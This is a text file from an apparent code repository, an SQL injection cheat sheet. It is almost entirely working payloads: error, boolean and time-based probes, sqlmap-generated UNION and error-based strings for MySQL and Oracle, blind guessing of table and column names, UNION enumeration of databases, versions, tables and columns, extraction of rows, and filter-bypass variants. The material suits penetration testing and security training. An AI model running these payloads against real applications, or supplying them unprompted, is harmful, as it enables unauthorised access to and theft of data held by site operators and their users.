-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathSql injection.txt
195 lines (99 loc) · 6.17 KB
/
Sql injection.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
***********************************************
SQL injection cheat sheet *
***********************************************
- First try to figure out vulnerable parameter
NOTE: If it's a get request don't forget to url encode the characters.
param=' --> try to get error
param=" --> try to get error
param=' or 1=1 --> try if it works
param=' or 1=0 --> check if it returns nothing
param=' and 1=1 --> check if this works or produces error
' or sleep(2) and 1=1# --> try get delay, sleep only operates when all other conditions are true and there is a requirement to operate it.
' or sleep(2)# --> try get delay
admin' and sleep(2)# --> will delay only if the user admin exists
' union select sleep(2),null# --> check if it produces delay
' union select sleep(2),null,null,null,null# --> check if it produces delay, check for different number of columns
try if above queries work by appending comment at the last
param=' or 1=1# --> try if it works
param=' or 1=1 -- one space needed --> try if it works
param=' or 1=1 // --> try if it works
param= or 1=1# --> try if it works
param=and or 1=1# --> try if it works
param=' or 1=1-- sd --> try if it works
If above queries don't work try with these sqlmap payoads:
'.)))("),.
'ghwshP<'">CZuifw
)+AND+4287=8913+AND+(7303=7303
)+AND+8680=8680+AND+(6351=6351
+AND+4573=5119
+AND+8680=8680
')+AND+9284=3986+AND+('ndfW'='ndfW
')+AND+8680=8680+AND+('juwu'='juwu
+AND+2138=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(102)||CHR(111)||CHR(77),5)
')+AND+2138=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(102)||CHR(111)||CHR(77),5)+AND+('VIDM'='VIDM
(SELECT+3273+FROM(SELECT+COUNT(*),CONCAT(0x716a6a7671,(SELECT+(ELT(3273=3273,1))),0x716b717071,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)
(SELECT+CONCAT(0x716a6a7671,(SELECT+(ELT(6967=6967,1))),0x716b717071))
+AND+4920=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(106)||CHR(118)||CHR(113)||(SELECT+(CASE+WHEN+(4920=4920)+THEN+1+ELSE+0+END)+FROM+DUAL)||CHR(113)||CHR(107)||CHR(113)||CHR(112)||CHR(113)||CHR(62)))+FROM+DUAL)
)+AND+7244=4397+AND+(3968=3968
)+AND+6379=6379+AND+(1483=1483
')+AND+2572=3816+AND+('alWa'='alWa
')+AND+6379=6379+AND+('mxeB'='mxeB
)+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+tsVj
+ORDER+BY+1--+UCdp
+UNION+ALL+SELECT+NULL--+UzBg
+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+ISdf
')+ORDER+BY+8048--+qQkS
')+UNION+ALL+SELECT+NULL--+TFas
')+UNION+ALL+SELECT+NULL,NULL--+EZcP
%'+ORDER+BY+1--+NSgg
%'+ORDER+BY+7605--+dZkK
%'+UNION+ALL+SELECT+NULL--+JQPp
%'+UNION+ALL+SELECT+NULL,NULL--+VtSC
+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+Lbrh
' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6b6271,IFNULL(CAST(table_name AS CHAR),0x20),0x7162627671),NULL,NULL FROM INFORMATION_SCHEMA.TABLES-- sd --> shows table_name inbetween few characers
If nothing works try these Blind sql payloads:
' AND (select 1)=1 <-- This should be TRUE Response -- subselect supported
Guessing Table name:
' AND (select 1 from admin limit 0,1)=1 <-- FALSE
' AND (select 1 from users limit 0,1)=1 <-- TRUE ======> Table found 'users'
Guessing Columns:
' AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- FALSE
' AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- TRUE =====> Column 'password' found.
Now determine number of columns in the current table
param=' or 1=1 order by 1#
param=' or 1=1 order by 10#
let say there are 3 columns
Now determine vulnerable columns or column which is visible
param=' or 1=0 union select null,null,null# --> if it produces no error then try
param=' or 1=0 union select 1,2,3# --> check which number shows in web page
Else try
param=' or 1=1 union select table_name,null,null from information_schema.tables#
if it produces error try table_name at other positions
Now, lets say column 1,2 are shown in web page
To futher enumerate
param=' or 1=0 union select table_schema,null,null from information_schema.columns# --> display all database name
Note 1=0 in above query to show only databases
param=' or 1=0 union select version(),null,null from information_schema.columns# --> retrieve version
param=' or 1=0 union select @@version,null,null from information_schema.columns# --> retrieve version in mssql
param=' or 1=0 union select substring(version(),1,1)=1,null,null from information_schema.columns# --> return true if version is 1.x.x
param=' or 1=0 union select substring(version(),1,1)=5,null,null from information_schema.columns# --> return true if version is 5.x.x
param=' or 1=0 union select substring(version(),3,1)=2,null,null from information_schema.columns# --> return true if version is 5.2.x
param=' or 1=0 union select table_name,null,null from information_schema.columns# --> display all table name
param=' or 1=1 select table_name,null,null from information_schema.columns where table_schema='public'# --> display tables inside public database
param=' or 1=1 select column_name,null,null from information_schema.columns where table_schema='public' and table_name='info'# --> display all columns of info table
param=' or 1=1 select table_name as table,column_name as column,null from information_schema.columns#
Let say the database name is public and table name is info
Let the table info has two columns id and name
param=' or 1=0 union select id,null,null from public.info# --> display id column from table "info"
param=' or 1=0 union select id,name,null from public.info# --> display id and name column from table "info"
param=' or 1=0 union select id,name,null from public.info where id='papa'# --> display id and name of 'papa'
BYPASSING filters
we can use case switching or commenting to bypass normal filters such as union, select
param=' or 1=0 UniOn selEct id,null,null FroM public.info#
param=' or 1=0 un//ion sele//ct id,null,null fr/**/om public.info# works in mssql
Useful Resources
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
http://garage4hackers.com/showthread.php?t=1990
For Oracle DB
Oracle does not have information schema and thus we need some alternatives for it. The link below can be helpful.
https://stackoverflow.com/questions/8739203/oracle-query-to-fetch-column-names